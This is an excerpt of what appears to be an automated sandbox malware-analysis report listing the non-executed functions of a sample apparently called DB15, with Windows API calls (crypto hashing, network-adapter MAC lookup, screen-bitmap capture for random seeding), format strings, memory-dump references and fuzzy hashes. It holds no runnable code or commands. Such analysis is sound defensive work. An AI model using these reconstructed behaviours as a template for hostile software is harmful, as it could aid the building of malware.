                                                                                                                                                                                                                                        • Instruction ID: 3b43283c781d39060a285e1a990033b4cd03b7dd602a36c1420ec248ee7b7319
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9923f7c5fc9e2703d867ea7c919ad7633f5c387dee158893e4253aa1c6881e72
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0411B171A00219EBDF00DF59DC41BDFBBA8EF05718F00452AF819A7280D7BE99558BDA
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                                        Function 00410FC0 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 149encryptionstringCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 00411010
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00411026
                                                                                                                                                                                                                                          • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                                                                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0041103B
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00411051
                                                                                                                                                                                                                                        • lstrlenA.KERNEL32(?,00000000), ref: 00411059
                                                                                                                                                                                                                                        • CryptHashData.ADVAPI32(00000000,?,00000000,?,00000000), ref: 00411064
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0041107A
                                                                                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,00000000,?,00000000), ref: 00411099
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 004110AB
                                                                                                                                                                                                                                        • _memset.LIBCMT ref: 004110CA
                                                                                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 004110DE
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 004110F0
                                                                                                                                                                                                                                        • _malloc.LIBCMT ref: 00411100
                                                                                                                                                                                                                                        • _memset.LIBCMT ref: 0041110B
                                                                                                                                                                                                                                        • _sprintf.LIBCMT ref: 0041112E
                                                                                                                                                                                                                                        • lstrcatA.KERNEL32(?,?), ref: 0041113C
                                                                                                                                                                                                                                        • CryptDestroyHash.ADVAPI32(00000000), ref: 00411154
                                                                                                                                                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0041115F
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
                                                                                                                                                                                                                                        • String ID: %.2X
                                                                                                                                                                                                                                        • API String ID: 2451520719-213608013
                                                                                                                                                                                                                                        • Opcode ID: 6f04bcb1d5af6720d81330ba6d25d2fff10d0e34b425382de5d36dfe67944e00
                                                                                                                                                                                                                                        • Instruction ID: afcee35d8fffc0279d29cc69f214b0122642615a52b78f57353c1cfd92a6c2ef
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6f04bcb1d5af6720d81330ba6d25d2fff10d0e34b425382de5d36dfe67944e00
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 92516171E40219BBDB10DBE5DC46FEFBBB8FB08704F14012AFA05B6291D77959018BA9
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00411900 Relevance: 29.8, APIs: 16, Strings: 1, Instructions: 95stringmemorywindowCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00411915
                                                                                                                                                                                                                                        • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 00411932
                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411941
                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411948
                                                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 00411956
                                                                                                                                                                                                                                        • lstrcpyW.KERNEL32(00000000,?), ref: 00411962
                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(00000000, failed with error ), ref: 00411974
                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(00000000,?), ref: 0041198B
                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(00000000,00500260), ref: 00411993
                                                                                                                                                                                                                                        • lstrcatW.KERNEL32(00000000,?), ref: 00411999
                                                                                                                                                                                                                                        • lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 004119A3
                                                                                                                                                                                                                                        • _memset.LIBCMT ref: 004119B8
                                                                                                                                                                                                                                        • lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 004119DC
                                                                                                                                                                                                                                          • Part of subcall function 00412BA0: lstrlenW.KERNEL32(?), ref: 00412BC9
                                                                                                                                                                                                                                        • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411A01
                                                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00411A04
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
                                                                                                                                                                                                                                        • String ID: failed with error
                                                                                                                                                                                                                                        • API String ID: 4182478520-946485432
                                                                                                                                                                                                                                        • Opcode ID: 18b9b32fccc37a3c6be161fd0b5e4603234beec1f634f25e965e40264c5ea564
                                                                                                                                                                                                                                        • Instruction ID: 1677776e610180b78075291f83559cfdcc99dc463041ebd32873df59a21ecb07
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 18b9b32fccc37a3c6be161fd0b5e4603234beec1f634f25e965e40264c5ea564
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0021FB31A40214B7D7516B929C85FAE3A38EF45B11F100025FB09B61D0DE741D419BED
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0040F730 Relevance: 29.2, APIs: 19, Instructions: 732COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411ACA
                                                                                                                                                                                                                                          • Part of subcall function 00411AB0: DispatchMessageW.USER32(?), ref: 00411AE0
                                                                                                                                                                                                                                          • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411AEE
                                                                                                                                                                                                                                        • PathFindFileNameW.SHLWAPI(?,?,00000000,000000FF), ref: 0040F900
                                                                                                                                                                                                                                        • _memmove.LIBCMT ref: 0040F9EA
                                                                                                                                                                                                                                        • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0040FA51
                                                                                                                                                                                                                                        • _memmove.LIBCMT ref: 0040FADA
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 273148273-0
                                                                                                                                                                                                                                        • Opcode ID: 9523524d8d3b45d9081d0fccdbbe5b8ea63895c3f5938442575e5094c992c0b6
                                                                                                                                                                                                                                        • Instruction ID: a2fe25dd57492d494e78aebb36a96054b80ce25314fb01b08d1ce03a62da89f0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9523524d8d3b45d9081d0fccdbbe5b8ea63895c3f5938442575e5094c992c0b6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D652A271D00208DBDF20DFA4D985BDEB7B4BF05308F10817AE419B7291D779AA89CB99
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0040E870 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 165encryptionCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000,00000000), ref: 0040E8CE
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040E8E4
                                                                                                                                                                                                                                          • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                                                                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040E8F9
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040E90F
                                                                                                                                                                                                                                        • CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 0040E928
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040E93E
                                                                                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0040E95D
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040E96F
                                                                                                                                                                                                                                        • _memset.LIBCMT ref: 0040E98E
                                                                                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040E9A2
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040E9B4
                                                                                                                                                                                                                                        • _sprintf.LIBCMT ref: 0040E9D3
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
                                                                                                                                                                                                                                        • String ID: %.2X
                                                                                                                                                                                                                                        • API String ID: 1084002244-213608013
                                                                                                                                                                                                                                        • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                                                                                                                                                                        • Instruction ID: 6020eefb82f776eec2353dc0ff897aa1862dcd4ecc30860888fbdadc8ba65bc1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 835173B1E40209EBDF11DFA2DC46FEEBB78EB04704F10452AF501B61C1D7796A158BA9
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0040EAA0 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 159encryptionCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000), ref: 0040EB01
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040EB17
                                                                                                                                                                                                                                          • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                                                                                                                                                                        • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040EB2C
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040EB42
                                                                                                                                                                                                                                        • CryptHashData.ADVAPI32(00000000,?,?,00000000), ref: 0040EB4E
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040EB64
                                                                                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,?,00000000), ref: 0040EB83
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040EB95
                                                                                                                                                                                                                                        • _memset.LIBCMT ref: 0040EBB4
                                                                                                                                                                                                                                        • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040EBC8
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 0040EBDA
                                                                                                                                                                                                                                        • _sprintf.LIBCMT ref: 0040EBF4
                                                                                                                                                                                                                                        • CryptDestroyHash.ADVAPI32(00000000), ref: 0040EC44
                                                                                                                                                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0040EC4F
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
                                                                                                                                                                                                                                        • String ID: %.2X
                                                                                                                                                                                                                                        • API String ID: 1637485200-213608013
                                                                                                                                                                                                                                        • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                                                                                                                                                                        • Instruction ID: 14d7d02cf3c54262bdef7e6fa07b3cadf7b2b7504ea62fb0b9d39e8d8664034d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A6515371E40209ABDF11DBA6DC46FEFBBB8EB04704F14052AF505B62C1D77969058BA8
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004822E0 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 127windowCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 004549A0: GetModuleHandleA.KERNEL32(?,?,00000001,?,00454B72), ref: 004549C7
                                                                                                                                                                                                                                          • Part of subcall function 004549A0: GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
                                                                                                                                                                                                                                          • Part of subcall function 004549A0: GetDesktopWindow.USER32 ref: 004549FB
                                                                                                                                                                                                                                          • Part of subcall function 004549A0: GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
                                                                                                                                                                                                                                          • Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
                                                                                                                                                                                                                                          • Part of subcall function 004549A0: GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
                                                                                                                                                                                                                                          • Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
                                                                                                                                                                                                                                          • Part of subcall function 004549A0: _wcsstr.LIBCMT ref: 00454A8A
                                                                                                                                                                                                                                        • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00482316
                                                                                                                                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00482323
                                                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 00482338
                                                                                                                                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00482341
                                                                                                                                                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,00000010), ref: 0048234E
                                                                                                                                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0048235C
                                                                                                                                                                                                                                        • GetObjectA.GDI32(00000000,00000018,?), ref: 0048236E
                                                                                                                                                                                                                                        • BitBlt.GDI32(?,00000000,00000000,?,00000010,?,00000000,00000000,00CC0020), ref: 004823CA
                                                                                                                                                                                                                                        • GetBitmapBits.GDI32(?,?,00000000), ref: 004823D6
                                                                                                                                                                                                                                        • SelectObject.GDI32(?,?), ref: 00482436
                                                                                                                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 0048243D
                                                                                                                                                                                                                                        • DeleteDC.GDI32(?), ref: 0048244A
                                                                                                                                                                                                                                        • DeleteDC.GDI32(?), ref: 00482450
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Object$CreateDelete$BitmapCapsCompatibleDeviceInformationSelectUserWindow$AddressBitsDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                                                                                                                                                        • String ID: .\crypto\rand\rand_win.c$DISPLAY
                                                                                                                                                                                                                                        • API String ID: 151064509-1805842116
                                                                                                                                                                                                                                        • Opcode ID: 1b801d1ffbd88b82039091f0604768a30c592b3e6827ab76a1e426d578563625
                                                                                                                                                                                                                                        • Instruction ID: 00d76d2b57e2ae43ffa0e146b327d2d4306243c0a97269805a4caa25bb15a565
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1b801d1ffbd88b82039091f0604768a30c592b3e6827ab76a1e426d578563625
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0441BB71944300EBD3105BB6DC86F6FBBF8FF85B14F00052EFA54962A1E77598008B6A
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0040E670 Relevance: 26.3, APIs: 12, Strings: 3, Instructions: 78COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • _malloc.LIBCMT ref: 0040E67F
                                                                                                                                                                                                                                          • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                                                                                                                                                                          • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                                                                                                                                                                          • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00710000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                                                                                                                                                                        • _malloc.LIBCMT ref: 0040E68B
                                                                                                                                                                                                                                        • _wprintf.LIBCMT ref: 0040E69E
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0040E6A4
                                                                                                                                                                                                                                          • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                                                                                                                                                                                                                                          • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                                                                                                                                                                                                                                        • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6B9
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0040E6C5
                                                                                                                                                                                                                                        • _malloc.LIBCMT ref: 0040E6CD
                                                                                                                                                                                                                                        • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6E0
                                                                                                                                                                                                                                        • _sprintf.LIBCMT ref: 0040E720
                                                                                                                                                                                                                                        • _wprintf.LIBCMT ref: 0040E732
                                                                                                                                                                                                                                        • _wprintf.LIBCMT ref: 0040E73C
                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0040E745
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • %02X:%02X:%02X:%02X:%02X:%02X, xrefs: 0040E71A
                                                                                                                                                                                                                                        • Address: %s, mac: %s, xrefs: 0040E72D
                                                                                                                                                                                                                                        • Error allocating memory needed to call GetAdaptersinfo, xrefs: 0040E699
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocateErrorFreeLast_sprintf
                                                                                                                                                                                                                                        • String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
                                                                                                                                                                                                                                        • API String ID: 3901070236-1604013687
                                                                                                                                                                                                                                        • Opcode ID: 3662c7b498418dd0805699ed7e156d37d96e3abec8e0c242f5b97c865e313c7a
                                                                                                                                                                                                                                        • Instruction ID: 1f0497fb971ee708fef02f82321736b2a43cb7681c3985dbc626545fd8dc3fd8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3662c7b498418dd0805699ed7e156d37d96e3abec8e0c242f5b97c865e313c7a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 251127B2A045647AC27162F76C02FFF3ADC8F45705F84056BFA98E1182EA5D5A0093B9
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 00410160 Relevance: 26.2, APIs: 17, Instructions: 660COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411ACA
                                                                                                                                                                                                                                          • Part of subcall function 00411AB0: DispatchMessageW.USER32(?), ref: 00411AE0
                                                                                                                                                                                                                                          • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411AEE
                                                                                                                                                                                                                                        • PathFindFileNameW.SHLWAPI(?,?,00000000), ref: 00410346
                                                                                                                                                                                                                                        • _memmove.LIBCMT ref: 00410427
                                                                                                                                                                                                                                        • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0041048E
                                                                                                                                                                                                                                        • _memmove.LIBCMT ref: 00410514
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 273148273-0
                                                                                                                                                                                                                                        • Opcode ID: 5579d069003674f30fc20657d67551341dfb12f417424f211cabcd1385ef9a93
                                                                                                                                                                                                                                        • Instruction ID: 4d52a43d2e6eeb98f1fe08e229a92f838bd03635929547cf71b8ba18611ce854
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5579d069003674f30fc20657d67551341dfb12f417424f211cabcd1385ef9a93
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EF429F70D00208DBDF14DFA4C985BDEB7F5BF04308F20456EE415A7291E7B9AA85CBA9
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0040FB98 Relevance: 15.3, APIs: 10, Instructions: 266stringCOMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.2840455223.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.2840455223.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Path$AppendExistsFile_free_malloc_memmovelstrcatlstrcpy
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3232302685-0
                                                                                                                                                                                                                                        • Opcode ID: 8e7fd9746f064940cb66d6ef43538eded20f2cba022702fc4082d6d5591459cc
                                                                                                                                                                                                                                        • Instruction ID: e959444c36dd18fc08dff6604914d564c76187b82df2896015b22d61e5b1ffa1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8e7fd9746f064940cb66d6ef43538eded20f2cba022702fc4082d6d5591459cc
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 09B19F70D00208DBDF20DFA4D945BDEB7B5BF15308F50407AE40AAB291E7799A89CF5A
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 004382A2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
